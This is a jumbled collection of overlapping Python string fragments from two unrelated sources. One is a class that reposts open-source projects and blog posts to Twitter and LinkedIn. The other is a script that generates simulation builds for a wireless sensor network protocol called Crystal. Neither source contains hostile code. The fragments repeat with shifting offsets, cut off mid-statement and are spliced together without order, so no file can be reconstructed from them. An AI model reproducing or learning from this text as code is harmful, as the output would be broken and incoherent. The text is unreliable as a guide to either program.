{}'.format(random_project.get('documentation','')) if", "class ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project: {name} is {description}. Check it out! 
{url}", "' Repo: {}'.format(random_project.get('repository','')) if 'type' in random_project: tweet = tweet + ' #{}'.format(random_project.get('type',''))", "<gh_stars>0 from .opensourceprojects import OpenSourceProjects from .blogposts import BlogPosts from .posttweet import PostTweet", "except: print(\"Error posting to LinkedIn\") pass #self.blog() def oss(self): random_project = OpenSourceProjects().get() tweet", "{description}. Check it out! {url} #reviveposts' _BLOG_MESSAGE = 'Blog Post: {name}. Check it", "pass #self.blog() def oss(self): random_project = OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try:", "import OpenSourceProjects from .blogposts import BlogPosts from .posttweet import PostTweet from .postlinkedin import", "print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( tweet, random_project['name'], random_project['url'] ) except: print(\"Error", "PostLinkedIn().post( message, random_blog['title'], random_blog['link'] ) except: print(\"Error posting to LinkedIn\") pass #self.blog() def", "import BlogPosts from .posttweet import PostTweet from .postlinkedin import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE", "name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( message,", "pass try: PostLinkedIn().post( tweet, random_project['name'], random_project['url'] ) except: print(\"Error posting to LinkedIn\") pass", "#reviveposts' def blog(self): random_blog = BlogPosts().get() try: message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] )", "tweet = tweet + ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting to Twitter\") pass", "posting to Twitter\") pass try: PostLinkedIn().post( message, random_blog['title'], random_blog['link'] ) except: 
print(\"Error posting", "Project: {name} is {description}. Check it out! {url} #reviveposts' _BLOG_MESSAGE = 'Blog Post:", "if 'documentation' in random_project: tweet = tweet + ' Docs: {}'.format(random_project.get('documentation','')) if 'repository'", "tweet + ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post(", "in random_project: tweet = tweet + ' Repo: {}'.format(random_project.get('repository','')) if 'type' in random_project:", "random_project: tweet = tweet + ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting to Twitter\")", "random_blog['link'] ) except: print(\"Error posting to LinkedIn\") pass #self.blog() def oss(self): random_project =", "= tweet + ' Docs: {}'.format(random_project.get('documentation','')) if 'repository' in random_project: tweet = tweet", "= self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error posting to Twitter\") pass try:", "description=random_project['description'], url=random_project['url']) try: if 'documentation' in random_project: tweet = tweet + ' Docs:", "from .posttweet import PostTweet from .postlinkedin import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE = 'OSS", "OpenSourceProjects from .blogposts import BlogPosts from .posttweet import PostTweet from .postlinkedin import PostLinkedIn", "from .blogposts import BlogPosts from .posttweet import PostTweet from .postlinkedin import PostLinkedIn class", "#self.blog() def oss(self): random_project = OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if", "Docs: {}'.format(random_project.get('documentation','')) if 'repository' in random_project: tweet = tweet + ' Repo: {}'.format(random_project.get('repository',''))", "print(\"Error posting to 
LinkedIn\") pass #self.blog() def oss(self): random_project = OpenSourceProjects().get() tweet =", "{}'.format(random_project.get('repository','')) if 'type' in random_project: tweet = tweet + ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except:", "out! {url} #reviveposts' _BLOG_MESSAGE = 'Blog Post: {name}. Check it out! {url} #reviveposts'", "to Twitter\") pass try: PostLinkedIn().post( tweet, random_project['name'], random_project['url'] ) except: print(\"Error posting to", "random_project: tweet = tweet + ' Docs: {}'.format(random_project.get('documentation','')) if 'repository' in random_project: tweet", "try: message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error posting to Twitter\")", "= 'Blog Post: {name}. Check it out! {url} #reviveposts' def blog(self): random_blog =", ".posttweet import PostTweet from .postlinkedin import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project:", "{url} #reviveposts' def blog(self): random_blog = BlogPosts().get() try: message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link']", "if 'repository' in random_project: tweet = tweet + ' Repo: {}'.format(random_project.get('repository','')) if 'type'", "random_blog = BlogPosts().get() try: message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error", "random_blog['title'], random_blog['link'] ) except: print(\"Error posting to LinkedIn\") pass #self.blog() def oss(self): random_project", "import PostTweet from .postlinkedin import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project: {name}", "BlogPosts from .posttweet import PostTweet from .postlinkedin import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE =", "self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error 
posting to Twitter\") pass try: PostLinkedIn().post(", "PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project: {name} is {description}. Check it out!", "print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( message, random_blog['title'], random_blog['link'] ) except: print(\"Error", ".postlinkedin import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project: {name} is {description}. Check", "{name} is {description}. Check it out! {url} #reviveposts' _BLOG_MESSAGE = 'Blog Post: {name}.", "= self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if 'documentation' in random_project: tweet = tweet +", "{}'.format(random_project.get('documentation','')) if 'repository' in random_project: tweet = tweet + ' Repo: {}'.format(random_project.get('repository','')) if", "posting to Twitter\") pass try: PostLinkedIn().post( tweet, random_project['name'], random_project['url'] ) except: print(\"Error posting", "= tweet + ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting to Twitter\") pass try:", "_OSS_MESSAGE = 'OSS Project: {name} is {description}. Check it out! {url} #reviveposts' _BLOG_MESSAGE", "tweet = tweet + ' Repo: {}'.format(random_project.get('repository','')) if 'type' in random_project: tweet =", "Check it out! {url} #reviveposts' _BLOG_MESSAGE = 'Blog Post: {name}. 
Check it out!", "to Twitter\") pass try: PostLinkedIn().post( message, random_blog['title'], random_blog['link'] ) except: print(\"Error posting to", "PostTweet from .postlinkedin import PostLinkedIn class ReviveSocialMedia: _OSS_MESSAGE = 'OSS Project: {name} is", "to LinkedIn\") pass #self.blog() def oss(self): random_project = OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'],", "random_project = OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if 'documentation' in random_project:", "Repo: {}'.format(random_project.get('repository','')) if 'type' in random_project: tweet = tweet + ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet)", "tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if 'documentation' in random_project: tweet = tweet", "'documentation' in random_project: tweet = tweet + ' Docs: {}'.format(random_project.get('documentation','')) if 'repository' in", "PostTweet().post(message) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( message, random_blog['title'], random_blog['link'] )", "PostTweet().post(tweet) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( tweet, random_project['name'], random_project['url'] )", "OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if 'documentation' in random_project: tweet =", "_BLOG_MESSAGE = 'Blog Post: {name}. Check it out! 
{url} #reviveposts' def blog(self): random_blog", ".blogposts import BlogPosts from .posttweet import PostTweet from .postlinkedin import PostLinkedIn class ReviveSocialMedia:", "LinkedIn\") pass #self.blog() def oss(self): random_project = OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url'])", ") except: print(\"Error posting to LinkedIn\") pass #self.blog() def oss(self): random_project = OpenSourceProjects().get()", "in random_project: tweet = tweet + ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting to", "self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if 'documentation' in random_project: tweet = tweet + '", "in random_project: tweet = tweet + ' Docs: {}'.format(random_project.get('documentation','')) if 'repository' in random_project:", "url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( message, random_blog['title'],", "'repository' in random_project: tweet = tweet + ' Repo: {}'.format(random_project.get('repository','')) if 'type' in", "random_project: tweet = tweet + ' Repo: {}'.format(random_project.get('repository','')) if 'type' in random_project: tweet", "+ ' #{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( tweet,", ") PostTweet().post(message) except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( message, random_blog['title'], random_blog['link']", "= OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if 'documentation' in random_project: tweet", "'type' in random_project: tweet = tweet + ' 
#{}'.format(random_project.get('type','')) PostTweet().post(tweet) except: print(\"Error posting", "{name}. Check it out! {url} #reviveposts' def blog(self): random_blog = BlogPosts().get() try: message", "'Blog Post: {name}. Check it out! {url} #reviveposts' def blog(self): random_blog = BlogPosts().get()", "try: PostLinkedIn().post( message, random_blog['title'], random_blog['link'] ) except: print(\"Error posting to LinkedIn\") pass #self.blog()", "except: print(\"Error posting to Twitter\") pass try: PostLinkedIn().post( tweet, random_project['name'], random_project['url'] ) except:", "url=random_project['url']) try: if 'documentation' in random_project: tweet = tweet + ' Docs: {}'.format(random_project.get('documentation',''))", "message = self._BLOG_MESSAGE.format( name=random_blog['title'], url=random_blog['link'] ) PostTweet().post(message) except: print(\"Error posting to Twitter\") pass", "try: PostLinkedIn().post( tweet, random_project['name'], random_project['url'] ) except: print(\"Error posting to LinkedIn\") pass #self.oss()", "def oss(self): random_project = OpenSourceProjects().get() tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url']) try: if 'documentation'", "= tweet + ' Repo: {}'.format(random_project.get('repository','')) if 'type' in random_project: tweet = tweet" ]
[ "env = os.environ.copy() env.update(new_env) abs_bname = os.path.join(apppath, binary_name) abs_ihex_name = abs_bname + \".ihex\"", "longskips, n_emptys, ccas, nodemaps): n_empty = NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir = \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink,", "new_env = mk_env(power, channel, sink, num_senders, longskip, n_empty, cca) prepare_binary(simdir, all_senders, active_epochs, num_senders,", "p[\"active_epochs\"] = active_epochs p[\"start_epoch\"] = start_epoch p[\"seed\"] = seed p[\"power\"] = power p[\"channel\"]", "import copy, rmtree import traceback import subprocess import itertools import re import random", "help='Base path') ap.add_argument('-c', '--config', required=False, default=\"params.py\", help='Configuration python file') args = ap.parse_args() import", "os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) try: os.makedirs(simdir) except OSError,e: print e nodelist =", "env=env) os.chdir(pwd) try: os.makedirs(simdir) except OSError,e: print e nodelist = os.path.join(simdir, \"nodelist.txt\") with", "print pars globals().update(pars) print \"--- Preparing simulations ------------------------\" all_nodes = set() with open(\"nodelist.txt\")", "ap.parse_args() import os from collections import namedtuple, OrderedDict from shutil import copy, rmtree", "= {%s};\"%\",\".join([str(x) for x in tbl]) binary_name = \"crystal.sky\" def prepare_binary(simdir, nodes, num_epochs,", "if testbed in (\"indriya\", \"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags += [\"-DCRYSTAL_START_DELAY_SINK=0\",", "= v CcaTuple = namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple = namedtuple(\"NemptyTuple\", \"r y z", "random.choice(nodes) if x not in r: r.append(x) l += 1 return r def", "\"nodemap.txt\")) 
num_nodes = len(all_senders) with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as f: p = OrderedDict()", "OrderedDict() p[\"testbed\"] = testbed p[\"num_nodes\"] = num_nodes p[\"active_epochs\"] = active_epochs p[\"start_epoch\"] = start_epoch", "def rnd_unique(nodes, n): l = 0 r = [] while (l<n): x =", "dur_s, dur_t, dur_a, sync_ack, longskip, payload, n_empty.r, n_empty.y, n_empty.z, n_empty.x, dyn_nempty, cca.dbm, cca.counter,", "testbed in (\"indriya\", \"fbk\", \"flock\", \"twist\"): cflags += [\"-DTINYOS_NODE_ID=1\"] if testbed == \"indriya\":", "chmap, boot_chop) if os.path.isdir(simdir): continue try: nodemap_txt = nodemap+\".txt\" if nodemap != \"all\"", "= [] if seed is not None: random.seed(seed) for _ in xrange(num_epochs): tbl", "f.write(\"\\n\") f.write(values) f.write(\"\\n\") simnum += 1 except Exception, e: traceback.print_exc() if os.path.isdir(simdir): rmtree(simdir)", "\"nodelist.txt\") with open(nodelist, \"w\") as f: for n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir)", "os.path.join(simdir, \"nodelist.txt\") with open(nodelist, \"w\") as f: for n in nodes: f.write(\"%d\\n\"%n) copy(abs_bname,", "\".env\" with open(abs_tbl_name, \"w\") as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd = os.getcwd() os.chdir(apppath)", "\"using the following params\" print pars globals().update(pars) print \"--- Preparing simulations ------------------------\" all_nodes", "+= [\"-DCOOJA=1\"] if testbed in (\"indriya\", \"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags", "as f: f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd = os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) try:", "p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"] = dur_s p[\"dur_a\"] = dur_a p[\"dur_t\"]", "\"r y z x\") defaults = { \"period\":2, \"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2, 2, 
4,", "= period p[\"senders\"] = num_senders p[\"sink\"] = sink p[\"n_tx_s\"] = n_tx_s p[\"n_tx_t\"] =", "= [ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s,", "\"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging: cflags += [\"-DCRYSTAL_LOGGING=1\"]", "in nodes: raise Exception(\"Sink node doesn't exist\") all_senders = [x for x in", "\"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging: cflags += [\"-DCRYSTAL_LOGGING=1\"] else: cflags +=", "== \"indriya\": cflags += [\"-DSHORT_LOGS=1\"] if testbed == \"cooja\": cflags += [\"-DCOOJA=1\"] if", "n_tx_s p[\"n_tx_t\"] = n_tx_t p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"] = dur_s p[\"dur_a\"] = dur_a", "sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params = args.config def rnd_unique(nodes, n): l = 0", "generate_table_array(nodes, num_epochs, concurrent_txs): tbl = [] if seed is not None: random.seed(seed) for", "simdir) copy(abs_env_name, simdir) copy(abs_tbl_name, simdir) def mk_env(power, channel, sink, num_senders, longskip, n_empty, cca):", "#\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, } set_defaults(pars, defaults) print \"using the following params\" print pars", "import os from collections import namedtuple, OrderedDict from shutil import copy, rmtree import", "= n_empty.r p[\"n_empty.y\"] = n_empty.y p[\"n_empty.z\"] = n_empty.z p[\"n_empty.x\"] = n_empty.x 
p[\"nodemap\"] =", "the following params\" print pars globals().update(pars) print \"--- Preparing simulations ------------------------\" all_nodes =", "\"logging\":True, \"seed\":None, } set_defaults(pars, defaults) print \"using the following params\" print pars globals().update(pars)", "] if logging: cflags += [\"-DCRYSTAL_LOGGING=1\"] else: cflags += [\"-DDISABLE_UART=1\"] if testbed in", "if os.path.isdir(simdir): continue try: nodemap_txt = nodemap+\".txt\" if nodemap != \"all\" and not", "const uint8_t sndtbl[] = {%s};\"%\",\".join([str(x) for x in tbl]) binary_name = \"crystal.sky\" def", "binary_name = \"crystal.sky\" def prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env): env = os.environ.copy() env.update(new_env)", "= {\"CFLAGS\":cflags} return new_env glb = {} pars = {} execfile(params, glb, pars)", "= dur_t p[\"sync_ack\"] = sync_ack p[\"longskip\"] = longskip p[\"n_empty\"] = n_empty.r p[\"n_empty.y\"] =", "#apppath = os.path.join(basepath, \"apps\", \"glossy-test\") #apppath = os.path.join(basepath, \"apps\", \"ta\") apppath = os.path.join(basepath,", "\"dbm counter\") NemptyTuple = namedtuple(\"NemptyTuple\", \"r y z x\") defaults = { \"period\":2,", "{ \"period\":2, \"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2, 2, 4, 0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)], \"payload\":2, #\"chmap\":\"nohop\",", "n_emptys, ccas, nodemaps): n_empty = NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir = \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders,", "[\"-DCOOJA=1\"] if testbed in (\"indriya\", \"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", \"-DCRYSTAL_START_DELAY_NONSINK=20\"] else: cflags +=", "[] while (l<n): x = random.choice(nodes) if x not in r: r.append(x) l", "\"cooja\": cflags += [\"-DCOOJA=1\"] if testbed in (\"indriya\", \"fbk\"): cflags += [\"-DCRYSTAL_START_DELAY_SINK=40\", 
\"-DCRYSTAL_START_DELAY_NONSINK=20\"]", "params = args.config def rnd_unique(nodes, n): l = 0 r = [] while", "= num_nodes p[\"active_epochs\"] = active_epochs p[\"start_epoch\"] = start_epoch p[\"seed\"] = seed p[\"power\"] =", "in nodes: f.write(\"%d\\n\"%n) copy(abs_bname, simdir) copy(abs_ihex_name, simdir) copy(abs_env_name, simdir) copy(abs_tbl_name, simdir) def mk_env(power,", "shutil import copy, rmtree import traceback import subprocess import itertools import re import", "nodes: raise Exception(\"Sink node doesn't exist\") all_senders = [x for x in nodes", "all_senders = [x for x in nodes if x!=sink] new_env = mk_env(power, channel,", "= nodemap p[\"cca\"] = cca.dbm p[\"cca_cnt\"] = cca.counter p[\"payload\"] = payload p[\"chmap\"] =", "(\"indriya\", \"fbk\", \"twist\"): cflags += [\"-DTINYOS_SERIAL_FRAMES=1\"] if testbed in (\"indriya\", \"fbk\", \"flock\", \"twist\"):", "set() with open(\"nodelist.txt\") as f: for l in f: l = l.strip() if", "ccas, nodemaps): n_empty = NemptyTuple(*n_empty) cca = CcaTuple(*cca) simdir = \"sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s\"%(sink, num_senders, power,", "p[\"n_empty.y\"] = n_empty.y p[\"n_empty.z\"] = n_empty.z p[\"n_empty.x\"] = n_empty.x p[\"nodemap\"] = nodemap p[\"cca\"]", "default=\"params.py\", help='Configuration python file') args = ap.parse_args() import os from collections import namedtuple,", "params\" print pars globals().update(pars) print \"--- Preparing simulations ------------------------\" all_nodes = set() with", "= { \"period\":2, \"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2, 2, 4, 0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)], \"payload\":2,", "longskip p[\"n_empty\"] = n_empty.r p[\"n_empty.y\"] = n_empty.y p[\"n_empty.z\"] = n_empty.z p[\"n_empty.x\"] = n_empty.x", "= payload p[\"chmap\"] = chmap p[\"boot_chop\"] = boot_chop p[\"full_epochs\"] = full_epochs header =", 
"n_tx_t p[\"n_tx_a\"] = n_tx_a p[\"dur_s\"] = dur_s p[\"dur_a\"] = dur_a p[\"dur_t\"] = dur_t", "+= 1 except Exception, e: traceback.print_exc() if os.path.isdir(simdir): rmtree(simdir) raise e print \"%d", "channels, sinks, num_senderss, longskips, n_emptys, ccas, nodemaps): n_empty = NemptyTuple(*n_empty) cca = CcaTuple(*cca)", "\"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\", \"logging\":True, \"seed\":None, } set_defaults(pars, defaults) print \"using the following params\"", "p[\"full_epochs\"] = full_epochs header = \" \".join(p.keys()) values = \" \".join([str(x) for x", "abs_bname = os.path.join(apppath, binary_name) abs_ihex_name = abs_bname + \".ihex\" abs_tbl_name = os.path.join(apppath, \"sndtbl.c\")", "with open(os.path.join(simdir, \"params_tbl.txt\"), \"w\") as f: p = OrderedDict() p[\"testbed\"] = testbed p[\"num_nodes\"]", "\"-DDUR_A_MS=%d\"%dur_a, \"-DCRYSTAL_SYNC_ACKS=%d\"%sync_ack, \"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop,", "os.path.join(apppath, \"sndtbl.c\") abs_env_name = abs_bname + \".env\" with open(abs_tbl_name, \"w\") as f: f.write(generate_table_array(nodes,", "\"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ] if logging: cflags", "= args.config def rnd_unique(nodes, n): l = 0 r = [] while (l<n):", 
"\"-DCRYSTAL_LONGSKIP=%d\"%longskip, \"-DCRYSTAL_PAYLOAD_LENGTH=%d\"%payload, \"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d\"%n_empty.r, \"-DCRYSTAL_MAX_SILENT_TAS=%d\"%n_empty.y, \"-DCRYSTAL_MAX_MISSING_ACKS=%d\"%n_empty.z, \"-DCRYSTAL_SINK_MAX_NOISY_TS=%d\"%n_empty.x, \"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d\"%dyn_nempty, \"-DCCA_THRESHOLD=%d\"%cca.dbm, \"-DCCA_COUNTER_THRESHOLD=%d\"%cca.counter, \"-DCHHOP_MAPPING=CHMAP_%s\"%chmap, \"-DBOOT_CHOPPING=BOOT_%s\"%boot_chop, \"-DN_FULL_EPOCHS=%d\"%full_epochs, ]", "concurrent_txs, new_env): env = os.environ.copy() env.update(new_env) abs_bname = os.path.join(apppath, binary_name) abs_ihex_name = abs_bname", "num_epochs, concurrent_txs): tbl = [] if seed is not None: random.seed(seed) for _", "+= [\".\", os.path.join(basepath,\"test_tools\")] params = args.config def rnd_unique(nodes, n): l = 0 r", "num_senders, longskip, n_empty, cca, nodemap) in itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys, ccas,", "dur_t p[\"sync_ack\"] = sync_ack p[\"longskip\"] = longskip p[\"n_empty\"] = n_empty.r p[\"n_empty.y\"] = n_empty.y", "not in nodes: raise Exception(\"Sink node doesn't exist\") all_senders = [x for x", "l.strip() if l: nodes.remove(int(l.strip().split()[0])) if sink not in nodes: raise Exception(\"Sink node doesn't", "cca.dbm p[\"cca_cnt\"] = cca.counter p[\"payload\"] = payload p[\"chmap\"] = chmap p[\"boot_chop\"] = boot_chop", "v CcaTuple = namedtuple(\"CcaTuple\", \"dbm counter\") NemptyTuple = namedtuple(\"NemptyTuple\", \"r y z x\")", "def generate_table_array(nodes, num_epochs, concurrent_txs): tbl = [] if seed is not None: random.seed(seed)", "return new_env glb = {} pars = {} execfile(params, glb, pars) def set_defaults(dst,", "pars = {} execfile(params, glb, pars) def set_defaults(dst, src): for k,v in src.items():", "f.write(generate_table_array(nodes, num_epochs, concurrent_txs)) pwd = os.getcwd() os.chdir(apppath) subprocess.check_call([\"sh\",\"-c\",\"./build_simgen.sh\"], env=env) os.chdir(pwd) 
try: os.makedirs(simdir) except", "= 0 for (power, channel, sink, num_senders, longskip, n_empty, cca, nodemap) in itertools.product(powers,", "active_epochs, num_senders, new_env) if nodemap != \"all\": copy(nodemap_txt, os.path.join(simdir, \"nodemap.txt\")) num_nodes = len(all_senders)", "env.update(new_env) abs_bname = os.path.join(apppath, binary_name) abs_ihex_name = abs_bname + \".ihex\" abs_tbl_name = os.path.join(apppath,", "OrderedDict from shutil import copy, rmtree import traceback import subprocess import itertools import", "\"crystal\") sys.path += [\".\", os.path.join(basepath,\"test_tools\")] params = args.config def rnd_unique(nodes, n): l =", "args.config def rnd_unique(nodes, n): l = 0 r = [] while (l<n): x", "1 except Exception, e: traceback.print_exc() if os.path.isdir(simdir): rmtree(simdir) raise e print \"%d simulation(s)", "{} execfile(params, glb, pars) def set_defaults(dst, src): for k,v in src.items(): if k", "cflags += [\"-DCRYSTAL_LOGGING=1\"] else: cflags += [\"-DDISABLE_UART=1\"] if testbed in (\"indriya\", \"fbk\", \"twist\"):", "f: l = l.strip() if l: all_nodes.add(int(l.strip())) simnum = 0 for (power, channel,", "[ \"-DTX_POWER=%d\"%power, \"-DRF_CHANNEL=%d\"%channel, \"-DCRYSTAL_SINK_ID=%d\"%sink, \"-DSTART_EPOCH=%d\"%start_epoch, \"-DCONCURRENT_TXS=%d\"%num_senders, \"-DNUM_ACTIVE_EPOCHS=%d\"%active_epochs, \"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t,", "dur_s p[\"dur_a\"] = dur_a p[\"dur_t\"] = dur_t p[\"sync_ack\"] = sync_ack p[\"longskip\"] = longskip", "\"period\":2, \"sync_ack\":1, \"dyn_nempty\":0, #\"n_emptys\":[(2, 2, 4, 0)], \"nodemaps\":[\"all\"], \"ccas\":[(-32, 100)], \"payload\":2, #\"chmap\":\"nohop\", #\"boot_chop\":\"nohop\",", "\"-DCRYSTAL_CONF_PERIOD=%f\"%period, \"-DN_TX_S=%d\"%n_tx_s, \"-DN_TX_T=%d\"%n_tx_t, \"-DN_TX_A=%d\"%n_tx_a, \"-DDUR_S_MS=%d\"%dur_s, \"-DDUR_T_MS=%d\"%dur_t, 
